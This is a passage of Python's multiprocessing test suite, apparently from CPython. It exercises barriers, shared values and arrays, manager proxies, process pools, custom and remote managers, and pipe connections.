Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
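        # Every child sends its pass index after each barrier.wait(), so the
        # parent must receive N copies of each index, in order.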
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
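        # With lock=True (the default), lock=None or an explicit Lock the
        # wrapper exposes get_lock()/get_obj(); with lock=False or RawValue
        # it does not.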
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
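    # Tracks the number of live instances so tests can check that task
    # arguments and results have been released.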
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
    def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError raised at the very start of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError raised at the very start of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError raised at the very start of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
        # We want to ensure that the traceback from the child process is
        # contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def raising():
raise KeyError("key")
def unpickleable_result():
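    # A lambda cannot be pickled, so sending this result back from a worker
    # raises MaybeEncodingError.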
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
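# Proxy exposing only __next__, so the generator returned by baz() can be
# iterated through the manager.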
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
        # Note that xmlrpclib will deserialize the tuple as a list, not a tuple.
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
            # Close the connection.Listener socket which gets opened as part
            # of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
        really_big_msg = latin('X') * (1024 * 1024 * 16)   # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
